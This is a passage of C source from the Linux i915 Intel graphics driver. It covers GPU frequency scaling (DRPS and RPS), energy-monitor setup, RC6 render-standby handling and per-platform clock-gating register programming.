	dev_priv->fstart = fstart;

	dev_priv->max_delay = fstart;
	dev_priv->min_delay = fmin;
	dev_priv->cur_delay = fstart;

	DRM_DEBUG_DRIVER("fmax: %d, fmin: %d, fstart: %d\n",
			 fmax, fmin, fstart);

	I915_WRITE(MEMINTREN, MEMINT_CX_SUPR_EN | MEMINT_EVAL_CHG_EN);

	/*
	 * Interrupts will be enabled in ironlake_irq_postinstall
	 */

	I915_WRITE(VIDSTART, vstart);
	POSTING_READ(VIDSTART);

	rgvmodectl |= MEMMODE_SWMODE_EN;
	I915_WRITE(MEMMODECTL, rgvmodectl);

	if (wait_for((I915_READ(MEMSWCTL) & MEMCTL_CMD_STS) == 0, 10))
		DRM_ERROR("stuck trying to change perf mode\n");
	msleep(1);

	ironlake_set_drps(dev, fstart);

	/* Snapshot energy/busy counters for later delta accounting. */
	dev_priv->last_count1 = I915_READ(0x112e4) + I915_READ(0x112e8) +
		I915_READ(0x112e0);
	dev_priv->last_time1 = jiffies_to_msecs(jiffies);
	dev_priv->last_count2 = I915_READ(0x112f4);
	getrawmonotonic(&dev_priv->last_time2);
}
/* Disable Ironlake DRPS: mask and ack the frequency-change interrupts,
 * return to the starting frequency, and park the mailbox. */
void ironlake_disable_drps(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u16 rgvswctl = I915_READ16(MEMSWCTL);

	/* Ack interrupts, disable EFC interrupt */
	I915_WRITE(MEMINTREN, I915_READ(MEMINTREN) & ~MEMINT_EVAL_CHG_EN);
	I915_WRITE(MEMINTRSTS, MEMINT_EVAL_CHG);
	I915_WRITE(DEIER, I915_READ(DEIER) & ~DE_PCU_EVENT);
	I915_WRITE(DEIIR, DE_PCU_EVENT);
	I915_WRITE(DEIMR, I915_READ(DEIMR) | DE_PCU_EVENT);

	/* Go back to the starting frequency */
	ironlake_set_drps(dev, dev_priv->fstart);
	msleep(1);
	rgvswctl |= MEMCTL_CMD_STS;
	I915_WRITE(MEMSWCTL, rgvswctl);
	msleep(1);
}
/* Request a new gen6 render frequency @val via the software request
 * register (frequency field lives in bits 31:25 of GEN6_RPNSWREQ).
 *
 * Fix: the shift is now performed on a u32.  "(val & 0x3ff) << 25" is
 * evaluated in signed int; for val >= 64 the result would overflow into
 * the sign bit, which is undefined behaviour for signed left shifts. */
void gen6_set_rps(struct drm_device *dev, u8 val)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 swreq;

	swreq = ((u32)val & 0x3ff) << 25;
	I915_WRITE(GEN6_RPNSWREQ, swreq);
}
/* Disable gen6 RPS: cancel any software request, mask and disable the PM
 * interrupts, clear the cached IIR state under the rps lock, and ack any
 * interrupt that raced in. */
void gen6_disable_rps(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;

	I915_WRITE(GEN6_RPNSWREQ, 1 << 31);
	I915_WRITE(GEN6_PMINTRMSK, 0xffffffff);
	I915_WRITE(GEN6_PMIER, 0);

	spin_lock_irq(&dev_priv->rps_lock);
	dev_priv->pm_iir = 0;
	spin_unlock_irq(&dev_priv->rps_lock);

	/* Ack by writing back whatever is currently pending. */
	I915_WRITE(GEN6_PMIIR, I915_READ(GEN6_PMIIR));
}
/* Decode a PXVFREQ register value into a frequency in kHz:
 * bits 21:16 hold the divider, bits 13:12 the post divider (as a power
 * of two), and bits 2:0 the pre divider.  Returns 0 when the pre
 * divider field is zero (entry unused). */
static unsigned long intel_pxfreq(u32 vidfreq)
{
	int pre = vidfreq & 0x7;
	int post = (vidfreq >> 12) & 0x3;
	int div = (vidfreq >> 16) & 0x3f;

	if (pre == 0)
		return 0;

	return (div * 133333) / ((1 << post) * pre);
}
/* Program the energy monitor (EMON/PMON) used by IPS: event energy
 * weights, per-P-state power weights derived from the PXVFREQ fuses, and
 * the assorted magic calibration registers, then enable monitoring and
 * cache the fuse correction factor. */
void intel_init_emon(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 lcfuse;
	u8 pxw[16];
	int i;

	/* Disable to program */
	I915_WRITE(ECR, 0);
	POSTING_READ(ECR);

	/* Program energy weights for various events */
	I915_WRITE(SDEW, 0x15040d00);
	I915_WRITE(CSIEW0, 0x007f0000);
	I915_WRITE(CSIEW1, 0x1e220004);
	I915_WRITE(CSIEW2, 0x04000004);

	for (i = 0; i < 5; i++)
		I915_WRITE(PEW + (i * 4), 0);
	for (i = 0; i < 3; i++)
		I915_WRITE(DEW + (i * 4), 0);

	/* Program P-state weights to account for frequency power adjustment */
	for (i = 0; i < 16; i++) {
		u32 pxvidfreq = I915_READ(PXVFREQ_BASE + (i * 4));
		unsigned long freq = intel_pxfreq(pxvidfreq);
		unsigned long vid = (pxvidfreq & PXVFREQ_PX_MASK) >>
			PXVFREQ_PX_SHIFT;
		unsigned long val;

		/* Weight ~ V^2 * f, scaled into a byte. */
		val = vid * vid;
		val *= (freq / 1000);
		val *= 255;
		val /= (127*127*900);
		if (val > 0xff)
			DRM_ERROR("bad pxval: %ld\n", val);
		pxw[i] = val;
	}
	/* Render standby states get 0 weight */
	pxw[14] = 0;
	pxw[15] = 0;

	/* Pack the 16 byte weights into four 32-bit registers. */
	for (i = 0; i < 4; i++) {
		u32 val = (pxw[i*4] << 24) | (pxw[(i*4)+1] << 16) |
			(pxw[(i*4)+2] << 8) | (pxw[(i*4)+3]);
		I915_WRITE(PXW + (i * 4), val);
	}

	/* Adjust magic regs to magic values (more experimental results) */
	I915_WRITE(OGW0, 0);
	I915_WRITE(OGW1, 0);
	I915_WRITE(EG0, 0x00007f00);
	I915_WRITE(EG1, 0x0000000e);
	I915_WRITE(EG2, 0x000e0000);
	I915_WRITE(EG3, 0x68000300);
	I915_WRITE(EG4, 0x42000000);
	I915_WRITE(EG5, 0x00140031);
	I915_WRITE(EG6, 0);
	I915_WRITE(EG7, 0);

	for (i = 0; i < 8; i++)
		I915_WRITE(PXWL + (i * 4), 0);

	/* Enable PMON + select events */
	I915_WRITE(ECR, 0x80000019);

	lcfuse = I915_READ(LCFUSE02);

	dev_priv->corr = (lcfuse & LCFUSE_HIV_MASK);
}
void gen6_enable_rps(struct drm_i915_private *dev_priv)
{
u32 rp_state_cap = I915_READ(GEN6_RP_STATE_CAP);
u32 gt_perf_status = I915_READ(GEN6_GT_PERF_STATUS);
u32 pcu_mbox, rc6_mask = 0;
int cur_freq, min_freq, max_freq;
int i;
/* Here begins a magic sequence of register writes to enable
* auto-downclocking.
*
* Perhaps there might be some value in exposing these to
* userspace...
*/
I915_WRITE(GEN6_RC_STATE, 0);
mutex_lock(&dev_priv->dev->struct_mutex);
gen6_gt_force_wake_get(dev_priv);
/* disable the counters and set deterministic thresholds */
I915_WRITE(GEN6_RC_CONTROL, 0);
I915_WRITE(GEN6_RC1_WAKE_RATE_LIMIT, 1000 << 16);
I915_WRITE(GEN6_RC6_WAKE_RATE_LIMIT, 40 << 16 | 30);
I915_WRITE(GEN6_RC6pp_WAKE_RATE_LIMIT, 30);
I915_WRITE(GEN6_RC_EVALUATION_INTERVAL, 125000);
I915_WRITE(GEN6_RC_IDLE_HYSTERSIS, 25);
for (i = 0; i < I915_NUM_RINGS; i++)
I915_WRITE(RING_MAX_IDLE(dev_priv->ring[i].mmio_base), 10);
I915_WRITE(GEN6_RC_SLEEP, 0);
I915_WRITE(GEN6_RC1e_THRESHOLD, 1000);
I915_WRITE(GEN6_RC6_THRESHOLD, 50000);
I915_WRITE(GEN6_RC6p_THRESHOLD, 100000);
I915_WRITE(GEN6_RC6pp_THRESHOLD, 64000); /* unused */
if (i915_enable_rc6)
rc6_mask = GEN6_RC_CTL_RC6p_ENABLE |
GEN6_RC_CTL_RC6_ENABLE;
I915_WRITE(GEN6_RC_CONTROL,
rc6_mask |
GEN6_RC_CTL_EI_MODE(1) |
GEN6_RC_CTL_HW_ENABLE);
I915_WRITE(GEN6_RPNSWREQ,
GEN6_FREQUENCY(10) |
GEN6_OFFSET(0) |
GEN6_AGGRESSIVE_TURBO);
I915_WRITE(GEN6_RC_VIDEO_FREQ,
GEN6_FREQUENCY(12));
I915_WRITE(GEN6_RP_DOWN_TIMEOUT, 1000000);
I915_WRITE(GEN6_RP_INTERRUPT_LIMITS,
18 << 24 |
6 << 16);
I915_WRITE(GEN6_RP_UP_THRESHOLD, 10000);
I915_WRITE(GEN6_RP_DOWN_THRESHOLD, 1000000);
I915_WRITE(GEN6_RP_UP_EI, 100000);
I915_WRITE(GEN6_RP_DOWN_EI, 5000000);
I915_WRITE(GEN6_RP_IDLE_HYSTERSIS, 10);
I915_WRITE(GEN6_RP_CONTROL,
GEN6_RP_MEDIA_TURBO |
GEN6_RP_USE_NORMAL_FREQ |
GEN6_RP_MEDIA_IS_GFX |
GEN6_RP_ENABLE |
GEN6_RP_UP_BUSY_AVG |
GEN6_RP_DOWN_IDLE_CONT);
if (wait_for((I915_READ(GEN6_PCODE_MAILBOX) & GEN6_PCODE_READY) == 0,
500))
DRM_ERROR("timeout waiting for pcode mailbox to become idle\n");
I915_WRITE(GEN6_PCODE_DATA, 0);
I915_WRITE(GEN6_PCODE_MAILBOX,
GEN6_PCODE_READY |
GEN6_PCODE_WRITE_MIN_FREQ_TABLE);
if (wait_for((I915_READ(GEN6_PCODE_MAILBOX) & GEN6_PCODE_READY) == 0,
500))
DRM_ERROR("timeout waiting for pcode mailbox to finish\n");
min_freq = (rp_state_cap & 0xff0000) >> 16;
max_freq = rp_state_cap & 0xff;
cur_freq = (gt_perf_status & 0xff00) >> 8;
/* Check for overclock support */
if (wait_for((I915_READ(GEN6_PCODE_MAILBOX) & GEN6_PCODE_READY) == 0,
500))
DRM_ERROR("timeout waiting for pcode mailbox to become idle\n");
I915_WRITE(GEN6_PCODE_MAILBOX, GEN6_READ_OC_PARAMS);
pcu_mbox = I915_READ(GEN6_PCODE_DATA);
if (wait_for((I915_READ(GEN6_PCODE_MAILBOX) & GEN6_PCODE_READY) == 0,
500))
DRM_ERROR("timeout waiting for pcode mailbox to finish\n");
if (pcu_mbox & (1<<31)) { /* OC supported */
max_freq = pcu_mbox & 0xff;
DRM_DEBUG_DRIVER("overclocking supported, adjusting frequency max to %dMHz\n", pcu_mbox * 50);
}
/* In units of 100MHz */
dev_priv->max_delay = max_freq;
dev_priv->min_delay = min_freq;
dev_priv->cur_delay = cur_freq;
/* requires MSI enabled */
I915_WRITE(GEN6_PMIER,
GEN6_PM_MBOX_EVENT |
GEN6_PM_THERMAL_EVENT |
GEN6_PM_RP_DOWN_TIMEOUT |
GEN6_PM_RP_UP_THRESHOLD |
GEN6_PM_RP_DOWN_THRESHOLD |
GEN6_PM_RP_UP_EI_EXPIRED |
GEN6_PM_RP_DOWN_EI_EXPIRED);
spin_lock_irq(&dev_priv->rps_lock);
WARN_ON(dev_priv->pm_iir != 0);
I915_WRITE(GEN6_PMIMR, 0);
spin_unlock_irq(&dev_priv->rps_lock);
/* enable all PM interrupts */
I915_WRITE(GEN6_PMINTRMSK, 0);
gen6_gt_force_wake_put(dev_priv);
mutex_unlock(&dev_priv->dev->struct_mutex);
}
/*
 * gen6_update_ring_freq - program the GPU-to-ring frequency table
 * @dev_priv: i915 device private
 *
 * For every GPU frequency between min_delay and max_delay, tells the
 * PCU (via the pcode mailbox) which IA frequency to use as reference
 * when choosing a ring/memory frequency for that GPU frequency.
 */
void gen6_update_ring_freq(struct drm_i915_private *dev_priv)
{
	int min_freq = 15; /* presumably 50MHz units, i.e. 750MHz - see below */
	int gpu_freq, ia_freq, max_ia_freq;
	int scaling_factor = 180;
	max_ia_freq = cpufreq_quick_get_max(0);
	/*
	 * Default to measured freq if none found, PCU will ensure we don't go
	 * over
	 */
	if (!max_ia_freq)
		max_ia_freq = tsc_khz;
	/* Convert from kHz to MHz */
	max_ia_freq /= 1000;
	mutex_lock(&dev_priv->dev->struct_mutex);
	/*
	 * For each potential GPU frequency, load a ring frequency we'd like
	 * to use for memory access. We do this by specifying the IA frequency
	 * the PCU should use as a reference to determine the ring frequency.
	 */
	for (gpu_freq = dev_priv->max_delay; gpu_freq >= dev_priv->min_delay;
	     gpu_freq--) {
		int diff = dev_priv->max_delay - gpu_freq;
		/*
		 * For GPU frequencies less than 750MHz, just use the lowest
		 * ring freq.
		 */
		if (gpu_freq < min_freq)
			ia_freq = 800;
		else
			ia_freq = max_ia_freq - ((diff * scaling_factor) / 2);
		/* Mailbox wants the IA ratio in multiples of 100MHz. */
		ia_freq = DIV_ROUND_CLOSEST(ia_freq, 100);
		I915_WRITE(GEN6_PCODE_DATA,
			   (ia_freq << GEN6_PCODE_FREQ_IA_RATIO_SHIFT) |
			   gpu_freq);
		I915_WRITE(GEN6_PCODE_MAILBOX, GEN6_PCODE_READY |
			   GEN6_PCODE_WRITE_MIN_FREQ_TABLE);
		/* Best effort: on timeout skip this entry and continue. */
		if (wait_for((I915_READ(GEN6_PCODE_MAILBOX) &
			      GEN6_PCODE_READY) == 0, 10)) {
			DRM_ERROR("pcode write of freq table timed out\n");
			continue;
		}
	}
	mutex_unlock(&dev_priv->dev->struct_mutex);
}
/*
 * ironlake_init_clock_gating - gen5 (Ironlake) clock gating setup
 * @dev: drm device
 *
 * Disables the clock-gating units that conflict with FBC and CxSR,
 * programs the chicken bits required for memory self-refresh, and on
 * mobile parts sets the extra bits needed before FBC can be enabled.
 */
static void ironlake_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	uint32_t dspclk_gate = VRHUNIT_CLOCK_GATE_DISABLE;
	/* Required for FBC */
	dspclk_gate |= DPFCUNIT_CLOCK_GATE_DISABLE |
		DPFCRUNIT_CLOCK_GATE_DISABLE |
		DPFDUNIT_CLOCK_GATE_DISABLE;
	/* Required for CxSR */
	dspclk_gate |= DPARBUNIT_CLOCK_GATE_DISABLE;
	I915_WRITE(PCH_3DCGDIS0,
		   MARIUNIT_CLOCK_GATE_DISABLE |
		   SVSMUNIT_CLOCK_GATE_DISABLE);
	I915_WRITE(PCH_3DCGDIS1,
		   VFMUNIT_CLOCK_GATE_DISABLE);
	I915_WRITE(PCH_DSPCLK_GATE_D, dspclk_gate);
	/*
	 * According to the spec the following bits should be set in
	 * order to enable memory self-refresh
	 * The bit 22/21 of 0x42004
	 * The bit 5 of 0x42020
	 * The bit 15 of 0x45000
	 */
	I915_WRITE(ILK_DISPLAY_CHICKEN2,
		   (I915_READ(ILK_DISPLAY_CHICKEN2) |
		    ILK_DPARB_GATE | ILK_VSDPFD_FULL));
	I915_WRITE(ILK_DSPCLK_GATE,
		   (I915_READ(ILK_DSPCLK_GATE) |
		    ILK_DPARB_CLK_GATE));
	I915_WRITE(DISP_ARB_CTL,
		   (I915_READ(DISP_ARB_CTL) |
		    DISP_FBC_WM_DIS));
	/* Start from clean LP watermarks; update_wm reprograms them later. */
	I915_WRITE(WM3_LP_ILK, 0);
	I915_WRITE(WM2_LP_ILK, 0);
	I915_WRITE(WM1_LP_ILK, 0);
	/*
	 * Based on the document from hardware guys the following bits
	 * should be set unconditionally in order to enable FBC.
	 * The bit 22 of 0x42000
	 * The bit 22 of 0x42004
	 * The bit 7,8,9 of 0x42020.
	 */
	if (IS_IRONLAKE_M(dev)) {
		I915_WRITE(ILK_DISPLAY_CHICKEN1,
			   I915_READ(ILK_DISPLAY_CHICKEN1) |
			   ILK_FBCQ_DIS);
		I915_WRITE(ILK_DISPLAY_CHICKEN2,
			   I915_READ(ILK_DISPLAY_CHICKEN2) |
			   ILK_DPARB_GATE);
		I915_WRITE(ILK_DSPCLK_GATE,
			   I915_READ(ILK_DSPCLK_GATE) |
			   ILK_DPFC_DIS1 |
			   ILK_DPFC_DIS2 |
			   ILK_CLK_FBC);
	}
	I915_WRITE(ILK_DISPLAY_CHICKEN2,
		   I915_READ(ILK_DISPLAY_CHICKEN2) |
		   ILK_ELPIN_409_SELECT);
	I915_WRITE(_3D_CHICKEN2,
		   _3D_CHICKEN2_WM_READ_PIPELINED << 16 |
		   _3D_CHICKEN2_WM_READ_PIPELINED);
}
/*
 * gen6_init_clock_gating - Sandybridge clock gating setup
 * @dev: drm device
 *
 * Programs the chicken/gating bits required for memory self-refresh and
 * FBC, clears the LP watermarks, and disables trickle feed on every
 * display plane.
 */
static void gen6_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	int pipe;
	uint32_t dspclk_gate = VRHUNIT_CLOCK_GATE_DISABLE;
	I915_WRITE(PCH_DSPCLK_GATE_D, dspclk_gate);
	I915_WRITE(ILK_DISPLAY_CHICKEN2,
		   I915_READ(ILK_DISPLAY_CHICKEN2) |
		   ILK_ELPIN_409_SELECT);
	/* Start from clean LP watermarks; update_wm reprograms them later. */
	I915_WRITE(WM3_LP_ILK, 0);
	I915_WRITE(WM2_LP_ILK, 0);
	I915_WRITE(WM1_LP_ILK, 0);
	/*
	 * According to the spec the following bits should be
	 * set in order to enable memory self-refresh and fbc:
	 * The bit21 and bit22 of 0x42000
	 * The bit21 and bit22 of 0x42004
	 * The bit5 and bit7 of 0x42020
	 * The bit14 of 0x70180
	 * The bit14 of 0x71180
	 */
	I915_WRITE(ILK_DISPLAY_CHICKEN1,
		   I915_READ(ILK_DISPLAY_CHICKEN1) |
		   ILK_FBCQ_DIS | ILK_PABSTRETCH_DIS);
	I915_WRITE(ILK_DISPLAY_CHICKEN2,
		   I915_READ(ILK_DISPLAY_CHICKEN2) |
		   ILK_DPARB_GATE | ILK_VSDPFD_FULL);
	I915_WRITE(ILK_DSPCLK_GATE,
		   I915_READ(ILK_DSPCLK_GATE) |
		   ILK_DPARB_CLK_GATE |
		   ILK_DPFD_CLK_GATE);
	/* Disable trickle feed and flush the plane so the bit takes effect. */
	for_each_pipe(pipe) {
		I915_WRITE(DSPCNTR(pipe),
			   I915_READ(DSPCNTR(pipe)) |
			   DISPPLANE_TRICKLE_FEED_DISABLE);
		intel_flush_display_plane(dev_priv, pipe);
	}
}
/*
 * ivybridge_init_clock_gating - Ivybridge clock gating setup
 * @dev: drm device
 *
 * Clears the LP watermarks, disables VRHUNIT clock gating and trickle
 * feed on every display plane.
 */
static void ivybridge_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	int pipe;
	uint32_t dspclk_gate = VRHUNIT_CLOCK_GATE_DISABLE;
	I915_WRITE(PCH_DSPCLK_GATE_D, dspclk_gate);
	/* Start from clean LP watermarks; update_wm reprograms them later. */
	I915_WRITE(WM3_LP_ILK, 0);
	I915_WRITE(WM2_LP_ILK, 0);
	I915_WRITE(WM1_LP_ILK, 0);
	I915_WRITE(ILK_DSPCLK_GATE, IVB_VRHUNIT_CLK_GATE);
	/* Disable trickle feed and flush the plane so the bit takes effect. */
	for_each_pipe(pipe) {
		I915_WRITE(DSPCNTR(pipe),
			   I915_READ(DSPCNTR(pipe)) |
			   DISPPLANE_TRICKLE_FEED_DISABLE);
		intel_flush_display_plane(dev_priv, pipe);
	}
}
/*
 * g4x_init_clock_gating - G4x clock gating setup
 * @dev: drm device
 *
 * Disables the render and display clock-gating units that are known to
 * cause trouble on G4x; GM45 additionally needs DSS unit gating off.
 */
static void g4x_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	uint32_t dspclk_gate;
	I915_WRITE(RENCLK_GATE_D1, 0);
	I915_WRITE(RENCLK_GATE_D2, VF_UNIT_CLOCK_GATE_DISABLE |
		   GS_UNIT_CLOCK_GATE_DISABLE |
		   CL_UNIT_CLOCK_GATE_DISABLE);
	I915_WRITE(RAMCLK_GATE_D, 0);
	dspclk_gate = VRHUNIT_CLOCK_GATE_DISABLE |
		OVRUNIT_CLOCK_GATE_DISABLE |
		OVCUNIT_CLOCK_GATE_DISABLE;
	/* GM45 (mobile) needs the DSS unit kept ungated as well. */
	if (IS_GM45(dev))
		dspclk_gate |= DSSUNIT_CLOCK_GATE_DISABLE;
	I915_WRITE(DSPCLK_GATE_D, dspclk_gate);
}
/*
 * crestline_init_clock_gating - 965GM (Crestline) clock gating setup
 * @dev: drm device
 *
 * Disables RCC clock gating and clears the remaining gating registers;
 * DEUC is a 16-bit register, hence the I915_WRITE16.
 */
static void crestline_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	I915_WRITE(RENCLK_GATE_D1, I965_RCC_CLOCK_GATE_DISABLE);
	I915_WRITE(RENCLK_GATE_D2, 0);
	I915_WRITE(DSPCLK_GATE_D, 0);
	I915_WRITE(RAMCLK_GATE_D, 0);
	I915_WRITE16(DEUC, 0);
}
/*
 * broadwater_init_clock_gating - 965G (Broadwater) clock gating setup
 * @dev: drm device
 *
 * Disables the render clock-gating units known to misbehave on
 * Broadwater and clears RENCLK_GATE_D2.
 */
static void broadwater_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	I915_WRITE(RENCLK_GATE_D1, I965_RCZ_CLOCK_GATE_DISABLE |
		   I965_RCC_CLOCK_GATE_DISABLE |
		   I965_RCPB_CLOCK_GATE_DISABLE |
		   I965_ISC_CLOCK_GATE_DISABLE |
		   I965_FBC_CLOCK_GATE_DISABLE);
	I915_WRITE(RENCLK_GATE_D2, 0);
}
/*
 * gen3_init_clock_gating - gen3 clock gating setup
 * @dev: drm device
 *
 * Read-modify-write of D_STATE: turns on PLL D3 power-down plus the
 * graphics and dot clock gating bits.
 */
static void gen3_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	I915_WRITE(D_STATE, I915_READ(D_STATE) |
		   DSTATE_PLL_D3_OFF |
		   DSTATE_GFX_CLOCK_GATING |
		   DSTATE_DOT_CLOCK_GATING);
}
/* i85x: only the SV clock needs its gating disabled. */
static void i85x_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	I915_WRITE(RENCLK_GATE_D1, SV_CLOCK_GATE_DISABLE);
}
/* i830: only the overlay unit needs its clock gating disabled. */
static void i830_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	I915_WRITE(DSPCLK_GATE_D, OVRUNIT_CLOCK_GATE_DISABLE);
}
/*
 * ibx_init_clock_gating - Ibex Peak PCH clock gating setup
 * @dev: drm device
 */
static void ibx_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	/*
	 * On Ibex Peak and Cougar Point, we need to disable clock
	 * gating for the panel power sequencer or it will fail to
	 * start up when no ports are active.
	 */
	I915_WRITE(SOUTH_DSPCLK_GATE_D, PCH_DPLSUNIT_CLOCK_GATE_DISABLE);
}
/*
 * cpt_init_clock_gating - Cougar Point PCH clock gating setup
 * @dev: drm device
 */
static void cpt_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	int pipe;
	/*
	 * On Ibex Peak and Cougar Point, we need to disable clock
	 * gating for the panel power sequencer or it will fail to
	 * start up when no ports are active.
	 */
	I915_WRITE(SOUTH_DSPCLK_GATE_D, PCH_DPLSUNIT_CLOCK_GATE_DISABLE);
	I915_WRITE(SOUTH_CHICKEN2, I915_READ(SOUTH_CHICKEN2) |
		   DPLS_EDP_PPS_FIX_DIS);
	/* Without this, mode sets may fail silently on FDI */
	for_each_pipe(pipe)
		I915_WRITE(TRANS_CHICKEN2(pipe), TRANS_AUTOTRAIN_GEN_STALL_DIS);
}
/*
 * ironlake_teardown_rc6 - release the RC6 context pages
 * @dev: drm device
 *
 * Unpins and drops the reference on the render and power context
 * objects allocated by ironlake_setup_rc6(), if present.  Safe to call
 * when either or both were never allocated.
 */
static void ironlake_teardown_rc6(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	if (dev_priv->renderctx) {
		i915_gem_object_unpin(dev_priv->renderctx);
		drm_gem_object_unreference(&dev_priv->renderctx->base);
		dev_priv->renderctx = NULL;
	}
	if (dev_priv->pwrctx) {
		i915_gem_object_unpin(dev_priv->pwrctx);
		drm_gem_object_unreference(&dev_priv->pwrctx->base);
		dev_priv->pwrctx = NULL;
	}
}
/*
 * ironlake_disable_rc6 - turn off render-standby and free its contexts
 * @dev: drm device
 *
 * If RC6 was enabled (PWRCTXA non-zero), forces the GPU out of RC6,
 * disables the power context and restores RSTDBYCTL before tearing
 * down the context pages.
 */
static void ironlake_disable_rc6(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	if (I915_READ(PWRCTXA)) {
		/* Wake the GPU, prevent RC6, then restore RSTDBYCTL */
		I915_WRITE(RSTDBYCTL, I915_READ(RSTDBYCTL) | RCX_SW_EXIT);
		wait_for(((I915_READ(RSTDBYCTL) & RSX_STATUS_MASK) == RSX_STATUS_ON),
			 50);
		I915_WRITE(PWRCTXA, 0);
		POSTING_READ(PWRCTXA);
		I915_WRITE(RSTDBYCTL, I915_READ(RSTDBYCTL) & ~RCX_SW_EXIT);
		POSTING_READ(RSTDBYCTL);
	}
	ironlake_teardown_rc6(dev);
}
/*
 * ironlake_setup_rc6 - lazily allocate the RC6 context pages
 * @dev: drm device
 *
 * Ensures both the render context page (used by MI_SET_CONTEXT) and the
 * power context page (handed to PWRCTXA) exist.  On a partial failure
 * the already-allocated page is released again.
 *
 * Returns 0 on success or -ENOMEM if an allocation failed.
 */
static int ironlake_setup_rc6(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	/* Render context page, allocated only once. */
	if (!dev_priv->renderctx)
		dev_priv->renderctx = intel_alloc_context_page(dev);
	if (!dev_priv->renderctx)
		return -ENOMEM;
	/* Power context page, likewise allocated only once. */
	if (!dev_priv->pwrctx)
		dev_priv->pwrctx = intel_alloc_context_page(dev);
	if (!dev_priv->pwrctx) {
		/* Don't leak the render context on partial failure. */
		ironlake_teardown_rc6(dev);
		return -ENOMEM;
	}
	return 0;
}
/*
 * ironlake_enable_rc6 - enable render-standby (RC6) on Ironlake
 * @dev: drm device
 *
 * Allocates the RC6 context pages, emits the MI_SET_CONTEXT sequence
 * that points the hardware at the render context, waits for the ring to
 * go idle, then enables the power context via PWRCTXA.  Any failure
 * tears the contexts back down and leaves RC6 disabled.
 *
 * Fix vs. previous revision: corrected the duplicated word in the
 * "failed to enable ironlake power power savings" error message.
 */
void ironlake_enable_rc6(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	int ret;
	/* rc6 disabled by default due to repeated reports of hanging during
	 * boot and resume.
	 */
	if (!i915_enable_rc6)
		return;
	mutex_lock(&dev->struct_mutex);
	ret = ironlake_setup_rc6(dev);
	if (ret) {
		mutex_unlock(&dev->struct_mutex);
		return;
	}
	/*
	 * GPU can automatically power down the render unit if given a page
	 * to save state.
	 */
	ret = BEGIN_LP_RING(6);
	if (ret) {
		ironlake_teardown_rc6(dev);
		mutex_unlock(&dev->struct_mutex);
		return;
	}
	OUT_RING(MI_SUSPEND_FLUSH | MI_SUSPEND_FLUSH_EN);
	OUT_RING(MI_SET_CONTEXT);
	OUT_RING(dev_priv->renderctx->gtt_offset |
		 MI_MM_SPACE_GTT |
		 MI_SAVE_EXT_STATE_EN |
		 MI_RESTORE_EXT_STATE_EN |
		 MI_RESTORE_INHIBIT);
	OUT_RING(MI_SUSPEND_FLUSH);
	OUT_RING(MI_NOOP);
	OUT_RING(MI_FLUSH);
	ADVANCE_LP_RING();
	/*
	 * Wait for the command parser to advance past MI_SET_CONTEXT. The HW
	 * does an implicit flush, combined with MI_FLUSH above, it should be
	 * safe to assume that renderctx is valid
	 */
	ret = intel_wait_ring_idle(LP_RING(dev_priv));
	if (ret) {
		DRM_ERROR("failed to enable ironlake power savings\n");
		ironlake_teardown_rc6(dev);
		mutex_unlock(&dev->struct_mutex);
		return;
	}
	I915_WRITE(PWRCTXA, dev_priv->pwrctx->gtt_offset | PWRCTX_EN);
	I915_WRITE(RSTDBYCTL, I915_READ(RSTDBYCTL) & ~RCX_SW_EXIT);
	mutex_unlock(&dev->struct_mutex);
}
/*
 * intel_init_clock_gating - invoke the per-platform clock gating hooks
 * @dev: drm device
 *
 * Calls the GPU hook unconditionally (intel_init_display() always sets
 * one) and the PCH hook only where one was registered.
 */
void intel_init_clock_gating(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	dev_priv->display.init_clock_gating(dev);
	if (dev_priv->display.init_pch_clock_gating)
		dev_priv->display.init_pch_clock_gating(dev);
}
/* Set up chip specific display functions */
/*
 * intel_init_display - populate the per-generation display vtable
 * @dev: drm device
 *
 * Fills dev_priv->display with the DPMS/modeset, FBC, clock-speed,
 * watermark, clock-gating, FDI training and page-flip hooks that match
 * the detected hardware generation.  Hooks left NULL (e.g. update_wm
 * when latency values cannot be read) disable the corresponding
 * feature.
 */
static void intel_init_display(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	/* We always want a DPMS function */
	if (HAS_PCH_SPLIT(dev)) {
		dev_priv->display.dpms = ironlake_crtc_dpms;
		dev_priv->display.crtc_mode_set = ironlake_crtc_mode_set;
		dev_priv->display.update_plane = ironlake_update_plane;
	} else {
		dev_priv->display.dpms = i9xx_crtc_dpms;
		dev_priv->display.crtc_mode_set = i9xx_crtc_mode_set;
		dev_priv->display.update_plane = i9xx_update_plane;
	}
	/* FBC hooks, only where the hardware supports compression. */
	if (I915_HAS_FBC(dev)) {
		if (HAS_PCH_SPLIT(dev)) {
			dev_priv->display.fbc_enabled = ironlake_fbc_enabled;
			dev_priv->display.enable_fbc = ironlake_enable_fbc;
			dev_priv->display.disable_fbc = ironlake_disable_fbc;
		} else if (IS_GM45(dev)) {
			dev_priv->display.fbc_enabled = g4x_fbc_enabled;
